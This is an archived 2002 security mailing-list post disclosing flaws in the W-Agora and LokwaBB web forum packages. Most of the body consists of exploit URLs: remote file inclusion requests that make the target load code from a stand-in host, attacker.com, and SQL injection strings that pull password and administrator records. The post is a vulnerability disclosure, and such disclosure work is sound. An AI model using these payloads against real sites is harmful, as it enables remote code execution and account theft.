Security holes in LokwaBB and W-Agora

From: Frog Man (leseulfrogat_private)
Date: Sat Jun 08 2002 - 04:43:21 PDT

Next message: ash: "RE: Phone Switches + telephone banking etc"

Previous message: Lincoln Yeoh: "RE: PGP spoof decrypted output?"
Next in thread: Frog Man: "Security holes in LokwaBB and W-Agora"
Reply: ET LoWNOISE: "[LoWNOISE] ImageFolio Pro 2.2"
Reply: ET LoWNOISE: "[LoWNOISE] ImageFolio Pro 2.2"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Somebody advised me to post also on bugtraq not only on vuln-dev, I thus do 
it :)  I just hope that doesn't give more work to the webmasters.

Product 1 :
***********
W-Agora 4.1.3
http://www.w-agora.net

Problem :
- Including file

Exploits :
- With a file http://www.attacker.com/dbaccess.txt :
http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/postgres65.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/mysql.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/mssql7.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/msql.php?inc_dir=http://www.attacker.com&ext=txt

- With a file http://www.attacker.com/postgres65.txt :
http://[target]/include/postgres.php?inc_dir=http://www.attacker.com&ext=txt

- With the file http://www.attacker.com/auth.txt :
http://[target]/user/agora_user.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/user/ldap_example.php?inc_dir=http://www.attacker.com&ext=txt

More details in french :
http://www.ifrance.com/kitetoua/tuto/W-Agora.txt

Translated by Goolge :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FW-Agora.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools

Product 2 :
***********
LokwaBB 1.2.2
http://lokwa.farcom.com/

Problems :
- XSS
- Privates messages reading
- SQL Injection

Exploits :
- 
http://[target]/member.php?action=viewpro&member='%20OR%20password='PASSWORD
- 
http://[target]/member.php?action=viewpro&member='%20OR%20status='Administrator
- misc.php?action=forgot&send=yes&loser='%20OR%20password='PASSWORD
- http://[target]/pm.php?action=reply&pmid=[MESSAGE ID]

More details in french :
http://www.ifrance.com/kitetoua/tuto/LokwaBB.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FLokwaBB.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools



Sorry for my poor english :)
frog-m@n



_________________________________________________________________
Téléchargez MSN Explorer gratuitement à l'adresse 
http://explorer.msn.fr/intl.asp.

Next message: ash: "RE: Phone Switches + telephone banking etc"
Previous message: Lincoln Yeoh: "RE: PGP spoof decrypted output?"
Next in thread: Frog Man: "Security holes in LokwaBB and W-Agora"
Reply: ET LoWNOISE: "[LoWNOISE] ImageFolio Pro 2.2"
Reply: ET LoWNOISE: "[LoWNOISE] ImageFolio Pro 2.2"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat Jun 08 2002 - 10:37:52 PDT